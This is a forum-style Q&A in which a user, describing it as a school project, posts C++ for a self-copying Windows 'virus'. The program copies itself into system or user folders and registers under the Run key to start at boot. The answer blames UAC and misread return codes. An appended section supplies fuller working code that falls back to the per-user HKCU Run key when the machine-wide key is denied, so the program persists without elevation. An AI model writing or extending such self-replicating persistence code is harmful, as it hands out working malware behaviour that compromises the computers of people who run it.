Reputation: 75
I'm writing an experimental virus for my school project. It should copy itself and start itself. I started with this article, and I came to this:
#include <windows.h>
#include <iostream>
#include <string>
#include <tchar.h>
#include <stdio.h>
using namespace std;

int main()
{
    wchar_t system[MAX_PATH];
    wchar_t user[MAX_PATH];
    wchar_t pathtofile[MAX_PATH];
    HMODULE GetModH = GetModuleHandle(NULL);
    DWORD bufSize = MAX_PATH;

    // These buffer sizes are in characters, not bytes, so MAX_PATH rather than sizeof()
    GetModuleFileName(GetModH, pathtofile, MAX_PATH);
    GetSystemDirectory(system, MAX_PATH);

    // First choice: a copy in the system directory
    std::wstring s(system);
    s += std::wstring(L"\\virus.exe");
    std::wstring u;   // kept at function scope so sysfull never points at a destroyed string
    const WCHAR* sysfull = s.c_str();
    if(!CopyFile(pathtofile, sysfull, false))
    {
        // Second choice: the Public profile
        sysfull = L"C:\\Users\\Public\\virus.exe";
        if(!CopyFile(pathtofile, sysfull, false))
        {
            // Last resort: the current user's Documents folder
            GetUserName(user, &bufSize);
            u = L"C:\\Users\\";
            u += std::wstring(user);
            u += std::wstring(L"\\Documents\\virus.exe");
            sysfull = u.c_str();
            CopyFile(pathtofile, sysfull, false);
        }
    }

    // Register the copy under the machine-wide Run key
    HKEY hKey;
    bool t = RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey );
    // REG_SZ data is sized in bytes and includes the terminating NUL
    bool t1 = RegSetValueEx(hKey, L"Writing to the Registry Example", 0, REG_SZ, (const unsigned char*)sysfull, (DWORD)((wcslen(sysfull) + 1) * sizeof(wchar_t)));
    RegCloseKey(hKey);
    MessageBox(NULL,L"Hello",L"Messagebox Example",MB_OK);
    return 0;
}
The problem is when I look in regedit under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run there is no new key. RegOpenKeyEx and RegSetValueEx return true, and everything seems to be working fine, but it isn't, and I have no idea why.
I'm on Windows 8 and using VS12.
Upvotes: 0
Views: 1291
Reputation: 37192
Windows Vista and later block write access to certain sensitive locations like the HKEY_LOCAL_MACHINE key, C:\Windows, etc., via a mechanism known as UAC. If UAC is enabled (which it is, by default), admin-level users by default have a reduced set of privileges and programs need to use a technique known as elevation to gain full administrator privileges. Alternatively, you can launch your program as administrator via the right-click menu to give it full access.
Either way, with UAC turned on the user needs to approve the elevation via a dialog before the permissions are granted.
The registry functions like RegOpenKeyEx() return 0 on success and an error code on failure, not true/false. If you check the return code properly you'll see they're returning 5, which is ERROR_ACCESS_DENIED.
Upvotes: 1
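The answer's two points, written out as working C++ (an added example, not code from the question or the answer). It checks every registry call against ERROR_SUCCESS instead of casting to bool, sizes the REG_SZ data in bytes including the terminator, passes character counts (not sizeof) to GetModuleFileNameW, and reports whether the process token is elevated. It also goes one step beyond the answer: when HKLM returns ERROR_ACCESS_DENIED it falls back to the per-user HKCU\...\Run key, which a non-elevated token can write. The helper names (regSzByteSize, regOk, shouldFallBackToHkcu, addToRunKey, isElevated) and the value name "RunKeyDemo" are my own choices. The Win32 part compiles only on Windows; off Windows the file provides stand-ins for LSTATUS and the two error codes so the pure helpers can still be compiled and checked.

```cpp
// run_key_demo.cpp: proper LSTATUS handling for a Run-key write under UAC.
#include <cstdint>
#include <cstdio>
#include <string>

#ifdef _WIN32
#  include <windows.h>
#else
// Stand-ins so the portable helpers below compile and can be tested off Windows.
typedef long LSTATUS;
#  define ERROR_SUCCESS 0L
#  define ERROR_ACCESS_DENIED 5L
#endif

// REG_SZ data is sized in BYTES and must include the terminating NUL.
// (Passing sizeof(system) == 520 as in the question reads past the string buffer.)
inline std::uint32_t regSzByteSize(const std::wstring& s) {
    return static_cast<std::uint32_t>((s.size() + 1) * sizeof(wchar_t));
}

// Registry functions return an LSTATUS: ERROR_SUCCESS (0) or a Win32 error code.
// Casting that to bool turns every failure into "true", which is the bug in the question.
inline bool regOk(LSTATUS st) { return st == ERROR_SUCCESS; }

// ERROR_ACCESS_DENIED from HKLM means the token is not elevated; only then is a
// per-user fallback appropriate. Any other error should be reported, not masked.
inline bool shouldFallBackToHkcu(LSTATUS st) { return st == ERROR_ACCESS_DENIED; }

#ifdef _WIN32
// True when the process token is elevated (UAC consent given, or UAC disabled).
bool isElevated() {
    HANDLE tok = nullptr;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &tok)) return false;
    TOKEN_ELEVATION te = {};
    DWORD cb = sizeof(te);
    bool elevated = GetTokenInformation(tok, TokenElevation, &te, sizeof(te), &cb) && te.TokenIsElevated;
    CloseHandle(tok);
    return elevated;
}

// Write exePath under <hive>\Software\Microsoft\Windows\CurrentVersion\Run, trying
// HKLM first and HKCU only on access denied. Returns the hive name on success,
// nullptr on failure; *lastErr carries the real Win32 error code either way.
const char* addToRunKey(const std::wstring& valueName, const std::wstring& exePath, LSTATUS* lastErr) {
    static const wchar_t* kRunSubkey = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run";
    struct Hive { HKEY root; const char* name; } hives[] = {
        { HKEY_LOCAL_MACHINE, "HKLM" },
        { HKEY_CURRENT_USER,  "HKCU" },
    };
    for (const Hive& h : hives) {
        HKEY hKey = nullptr;
        LSTATUS st = RegOpenKeyExW(h.root, kRunSubkey, 0, KEY_SET_VALUE, &hKey);
        if (regOk(st)) {
            st = RegSetValueExW(hKey, valueName.c_str(), 0, REG_SZ,
                                reinterpret_cast<const BYTE*>(exePath.c_str()),
                                regSzByteSize(exePath));
            RegCloseKey(hKey);
        }
        *lastErr = st;
        if (regOk(st)) return h.name;
        if (!shouldFallBackToHkcu(st)) return nullptr;
    }
    return nullptr;
}

int main() {
    wchar_t self[MAX_PATH];
    // nSize is a character count, not a byte count; 0 or >= MAX_PATH means failure/truncation.
    DWORD n = GetModuleFileNameW(nullptr, self, MAX_PATH);
    if (n == 0 || n >= MAX_PATH) {
        std::printf("GetModuleFileNameW failed, error %lu\n", GetLastError());
        return 1;
    }
    std::printf("Token elevated: %s\n", isElevated() ? "yes" : "no");

    LSTATUS err = ERROR_SUCCESS;
    const char* hive = addToRunKey(L"RunKeyDemo", self, &err);   // "RunKeyDemo" is an arbitrary value name
    if (hive) {
        std::printf("Run value written under %s\n", hive);
        return 0;
    }
    std::printf("Run value not written, Win32 error %ld%s\n", err,
                err == ERROR_ACCESS_DENIED ? " (ERROR_ACCESS_DENIED: run elevated)" : "");
    return 1;
}
#else
int main() { std::puts("Registry demo is Win32-only; the helpers above are portable."); return 0; }
#endif
```

Build on Windows with `cl run_key_demo.cpp advapi32.lib` (the explicit W-suffixed calls mean no UNICODE define is needed). Run it once from a normal prompt and expect "Token elevated: no" plus a write under HKCU; run it from an elevated prompt and expect HKLM. Check the result in regedit under the matching hive's Run key, and delete the RunKeyDemo value when you are done.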